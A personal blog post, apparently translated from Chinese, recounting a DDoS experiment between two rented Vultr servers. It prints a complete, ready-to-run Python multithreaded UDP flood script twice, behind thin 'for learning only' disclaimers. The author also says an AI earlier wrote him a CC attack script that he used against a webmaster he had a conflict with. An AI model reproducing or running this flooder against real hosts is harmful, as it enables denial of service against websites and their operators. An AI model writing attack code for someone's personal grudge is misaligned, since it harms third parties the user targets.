A8DOG

A8DOG

随便写写,记录折腾过程!
telegram

So the cost of DDOS is so low, 26 lines of code complete the test.

This article is only for learning and discussing the principles of DDOS attacks, not for teaching people how to attack others' websites or engage in illegal activities.

Preface:#

Previously, I wrote an article Recording an Experience of CC Attacks which documented my experience as a novice, not knowing how to write a single line of code, but using AI to create a simple CC attack script to attack a webmaster who had a conflict with me (later, this webmaster retaliated with DDOS and CC attacks for a few days). In the end, the matter was resolved without any further consequences.

Today, this article is also a sudden idea to play with DDOS. I only know that DDOS sends a large number of requests to the target server, causing the server to become unavailable and consuming the server's resources. Finally, the server's IP is blacklisted by the service provider, achieving the effect of taking it down.

How_to_stop_DDoS_attacks_hero-1024x501

Attacks like UDP, TCP flood attacks, amplification attacks, etc. are things I have heard of, but I haven't seriously studied how they are implemented or the underlying principles. The explanations I found through Google search are quite official and not easy to digest and understand. So, I found an AI to have an alternative conversation to understand the implementation principles and used the AI to write a Python script to test the effects.

Code Testing:#

I opened two servers in the same region on Vultr, both using CPU-optimized servers. One is an $80 server and the other is a $160 server. In the initial code testing, it generated about 5 Mbps of traffic. Later, when I added 1000 concurrent connections, it only reached 7 Mbps. After communicating with the AI, I found that the peak traffic can be achieved by increasing the packet size.

I wrote a new code for testing, and on the Vultr dashboard, it showed:

Snipaste_2024-05-19_13-33-35

Both servers have a Gbps bandwidth, and they actually achieved a 4 Gbps effect. By monitoring through SSH connection tools, I could see an upstream of about 2 Gbps at its peak. The attacked server did receive this traffic. Since I immediately deleted the servers after testing (afraid of being banned by the provider, and there was still over $100 unused), I didn't take detailed screenshots.

I attacked my own server. Some servers died as soon as the traffic hit, while others couldn't be attacked individually, but when attacking both servers together, they went down. If we only count the monitoring through SSH connection tools, there was an upstream of about 3-5 Gbps. In just a short test, hundreds of GBs of traffic disappeared. Also, the Hong Kong BPG server I bought before was officially said to have a bandwidth of 500 Mbps. When testing the download speed with the script, it was actually close to 500 Mbps, and the upload speed could sometimes reach over 2000 Mbps. If those criminals have access to these servers or servers like ColoCrossing that have unlimited bandwidth and are not strictly regulated by the service provider, they can easily take down servers without defense or with low defense.

Code snippet:#

Note⚠️: You can only use this for learning and understanding the principles of DDOS attacks, and if you want to study how to defend against attacks. Do not use it for illegal activities or attacking other people's websites.

Whether from an SEO perspective or for some public welfare or profit-oriented websites, the stability of a website is very important. If you often walk by the river, you won't avoid getting your shoes wet. If you want to do illegal things, I advise you to be kind.

import socket
import threading
import time

def udp_flood(target_ip, target_port, message, duration, num_threads, packet_size=1024):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    bytes_to_send = message.encode('utf-8')
    end_time = time.time() + duration
    print(f"Starting UDP flood attack on {target_ip}:{target_port} for {duration} seconds with {num_threads} threads...")
    def send_udp():
        while time.time() < end_time:
            sock.sendto(bytes_to_send, (target_ip, target_port))
    threads = []
    for _ in range(num_threads):
        thread = threading.Thread(target=send_udp)
        thread.start()
        threads.append(thread)
    for thread in threads:
        thread.join()
    print("Attack finished.")

target_ip = "127.0.0.1"  # Target IP address
target_port = 80             # Target port
message = "A" * 20000         # Message to send (packet size of 1024 bytes)
duration = 100                # Duration (seconds)
num_threads = 10           # Number of concurrent threads
packet_size = 1024           # Size of each UDP packet (bytes)
udp_flood(target_ip, target_port, message, duration, num_threads, packet_size)

The above code has some lines and comments removed. If it doesn't work, please use the original version provided by the AI:

import socket
import threading
import time

def udp_flood(target_ip, target_port, message, duration, num_threads, packet_size=1024):
    # Create a UDP socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    
    # Encode the message into bytes
    bytes_to_send = message.encode('utf-8')
    
    # Get the current time
    end_time = time.time() + duration
    
    print(f"Starting UDP flood attack on {target_ip}:{target_port} for {duration} seconds with {num_threads} threads...")
    
    # Define the function to send UDP packets
    def send_udp():
        while time.time() < end_time:
            sock.sendto(bytes_to_send, (target_ip, target_port))
    
    # Start multiple threads to send UDP requests
    threads = []
    for _ in range(num_threads):
        thread = threading.Thread(target=send_udp)
        thread.start()
        threads.append(thread)
    
    # Wait for all threads to finish
    for thread in threads:
        thread.join()
    
    print("Attack finished.")

# Configure the attack parameters
target_ip = "127.0.0.1"  # Target IP address
target_port = 80             # Target port
message = "A" * 20000         # Message to send (packet size of 1024 bytes)
duration = 100                # Duration (seconds)
num_threads = 10           # Number of concurrent threads
packet_size = 1024           # Size of each UDP packet (bytes)

# Launch the attack
udp_flood(target_ip, target_port, message, duration, num_threads, packet_size)
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.